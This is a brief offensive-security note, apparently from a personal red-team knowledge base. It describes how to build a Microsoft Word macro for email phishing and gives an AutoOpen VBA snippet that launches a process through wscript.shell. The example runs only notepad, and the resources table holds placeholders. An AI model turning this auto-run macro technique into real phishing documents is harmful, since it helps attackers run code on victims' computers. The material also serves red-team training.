Secondary Categories: 02 - Social Engineering - 02 - Payloads Links: Email Phishing Search Tag:π
Microsoft Macros
Description:
To Add/Edit Macro go to ViewβMacros then create a new macro name
Make sure that the Macros are saved in the word document:
Once the victim clicks βEnable Contentβ then the document macros are always trusted.
Example
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "notepad"
End Sub
Resources:
Title | URL |
---|---|
place | holder |
Created Date: November 6th 2022 12:28
Last Modified Date: November 6th 2022 12:28